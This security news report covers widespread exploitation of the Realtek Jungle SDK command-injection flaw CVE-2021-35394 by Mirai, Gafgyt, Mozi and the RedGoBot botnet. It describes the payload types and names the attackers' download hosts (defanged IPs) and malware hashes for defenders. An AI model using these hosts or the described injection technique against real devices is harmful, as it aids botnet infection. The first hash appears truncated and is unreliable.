
Researchers have reported a surge in the number of attacks that attempted to exploit a Realtek Jungle SDK RCE that is tracked as CVE-2021-35394 with a CVSS score of 9.8. Nearly 134 million exploit attempt was made till last month – December 2022.
Realtek Jungle SDK version v2.x through v3.4.14B provides a diagnostic tool called ‘MP Daemon’ that is usually compiled as a ‘UDPServer’ binary. The binary is affected by multiple memory corruption vulnerabilities and an arbitrary command injection vulnerability that can be exploited by remote unauthenticated attackers.
The experts warned that the attacks conducted by multiple threat actors are still ongoing. Many of these attacks attempted to deliver malware to vulnerable IoT devices. Most of the malware samples belong to Mirai, Gafgyt, and Mozi families.
Researchers observed a new distributed IoT DDoS botnet developed in Golang, tracked as RedGoBot.
- In the first campaign observed in early September 2022, when the threat actor tried to deliver a shell script znet.sh downloader from 185.216.71[.]157 utilizing wget.
- In the second campaign, which was observed in November 2022, when the threat actor used a shell script with wget and curl to download the following botnet clients from 185.246.221[.]220
The analysis of the attacks in the wild revealed the use of the following three types of payloads:
- A script executes a shell command on the targeted server (mostly from the Mirai).
- An injected command directly writes the binary payload to a file and then executes it.
- An injected command directly reboots the targeted server to trigger a denial-of-service condition
The flaw affects almost 190 models of devices from 66 different manufacturers and the origin from the U.S., Vietnam, and Russia. But the use of Proxy VPN is also not ruled out. This surge can result in a possible supply chain attack which is difficult to detect and remediate.
This research was documented by researchers for Palo Alto
Indicators of Compromise
- 3ee4bd2f330bf6939cb9121f36261e42f54ffc45676120216fd8da4cb52036a
- 9dfaa2e60027427c9f1ff377ad3cd3bc800b914c4b9ea5e408442d25f475dab9
- 24d6cd113c9ddf49cb6140d2cc185f2cc033170ac27e2c352d94848cc449c312
- caa8b10057fb699d463f309913d0557462e8b37afdaf4d0c3cff63f9b9605f0d
- fd7da924fe743d2e09b10f4e8a01230f7bc884ae14ef0e6133e553de118a457e
- 0c734c8c0f8e575a08672d01fc5a729605b3e9dbb4d0c62bd94ad86d2c3d6aeb
- 85b07054472bbaa06d0611dfb28632ffa351d3b13e37b447914f49a1dfe07dc4
- a5478d51a809aed51d633611371c105e3ec82490f9516d186e7013dabcf8c77f
- bf9d92666d3b25cf6e49234472a2fa515107eb6df07f4aee6deb6a42eed4fa92
- 16787be5e8d7de5816d590efb4916c7415f458bc7059d2d287715fb3ef8e0783
- 67a655d4360cfe0ca5db17c6486f3dfbca1c82c2af4bc1f2019cee68199108c7